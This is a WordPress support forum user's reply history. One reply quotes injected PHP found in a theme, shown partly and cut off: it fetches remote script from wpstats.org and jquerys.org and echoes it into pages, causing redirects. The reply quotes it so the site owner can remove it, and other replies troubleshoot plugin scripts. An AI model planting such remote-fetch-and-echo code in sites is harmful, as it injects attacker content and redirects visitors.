M Grmn
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Unwanted Jquery (jquerys) scripttry removing
/* dont have a clue what the first on is though, but doesnt really look like you should have it *//* 1st piece doesnt look ok */ if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "https://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start(); /* second piece cuases redirct */ if(function_exists('curl_init')) { $url = "https://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data";
Forum: Fixing WordPress
In reply to: Unwanted Jquery (jquerys) scriptJust search your files
for string which says
insert_jquery_function
on nix you can use, sudo grep “insert_jquery_function” /directory of wordpress files/
for windows, dont have a clue!
Forum: Fixing WordPress
In reply to: Possible cloaking?Yes thank you… i realize its not even a problem for me now, i just took over the site, put on a wordpress, instead of what they had, seems they had it in there previous…
Sorry for false alarm…
I know you are right, however i havent enabled any plugins at all, only template!
Updated to 3.4.1 and updated default templates
cleared cachedoes work with
Twenty Eleven
Twenty TenBut besides those, none
Always get thisDates must have correct formatting. Please use the date picker provided.
+ the error code posted above
Any suggestions on how i can fix this
Same here,
Can not use events manager with any template, not even default templates
When looking in firebug, somehow <p> tags got inserted into the script
}else{ $('#event-tickets').fadeIn(); $("div#rsvp-data").fadeIn(); } });</p> /* <---- here */ <p> if($('input#event-rsvp').attr("checked")) { $("div#rsvp-data").fadeIn(); } else { $("div#rsvp-data").hide(); } });